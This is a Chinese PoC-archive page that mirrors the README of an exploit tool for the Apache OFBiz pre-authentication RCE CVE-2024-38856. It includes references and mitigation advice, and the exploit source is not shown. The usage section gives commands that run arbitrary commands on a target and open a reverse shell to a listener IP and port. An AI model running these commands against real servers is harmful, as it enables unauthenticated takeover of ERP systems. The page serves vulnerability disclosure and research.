POC详情: ba8fd285fa2b96e89df17924cc326e54f57eb227

来源
关联漏洞
标题: Apache OFBiz 安全漏洞 (CVE-2024-38856)
描述:Apache OFBiz是美国阿帕奇(Apache)基金会的一套企业资源计划(ERP)系统。该系统提供了一整套基于Java的Web应用程序组件和工具。 Apache OFBiz 18.12.14及之前版本存在安全漏洞,该漏洞源于存在授权错误漏洞,从而导致未经身份验证的端点可执行屏幕渲染代码。
描述
Exploit for Apache OFBiz - CVE-2024-38856
介绍

# Apache-OFBiz-Exploit
Exploit for Apache OFBiz (CVE-2024-38856)
By: **Alisson Faoli**

## Description

This repository contains an exploit for the CVE-2024-38856 vulnerability found in Apache OFBiz. The flaw allows Unauthenticated RCE (Remote Code Execution).

Note: This exploit is provided for educational and research purposes only. Misuse may be illegal and is the sole responsibility of the user.

## Vulnerability Details

CVE: **CVE-2024-38856**

Affected Software: Apache OFBiz up to version 18.12.14

Vulnerability Type: RCE

Exploitation: Authentication not required

## References: 

 - https://www.zscaler.com/blogs/security-research/cve-2024-38856-pre-auth-rce-vulnerability-apache-ofbiz
 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38856
 - https://www.cyfirma.com/research/cve-2024-38856-pre-authentication-remote-code-execution-rce-vulnerability-analysis-and-exploitation/

## Usage

Clone the repository:
```
git clone https://github.com/AlissonFaoli/Apache-OFBiz-Exploit.git
cd Apache-OFBiz-Exploit
```
Install the dependencies:
```
pip install -r requirements.txt
```
Run the exploit:

**RCE**:
```python3 CVE-2024-38856.py cmd -t https://10.150.10.200:8443 "whoami"```

**SHELL**:
```python3 CVE-2024-38856.py shell -t https://10.150.10.200:8443 -l 10.150.10.123 -p 4444```


## Mitigation
To remediate this vulnerability, it is recommended that Apache OFBiz administrators:
Update to the patched version available at [link to fix].
Apply firewall or WAF rules to block known exploitation attempts.

## Contact
If you have any questions or want to report an improvement to the exploit, contact me:
LinkedIn: https://linkedin.com/in/alisson-faoli/

#
#### Legal Disclaimer:
This code is provided solely for educational purposes and security testing in authorized environments. The author is not responsible for any misuse.
文件快照

[4.0K] /data/pocs/ba8fd285fa2b96e89df17924cc326e54f57eb227 ├── [3.0K] CVE-2024-38856.py ├── [6.9K] LICENSE ├── [1.8K] README.md └── [ 17] requirements.txt 0 directories, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。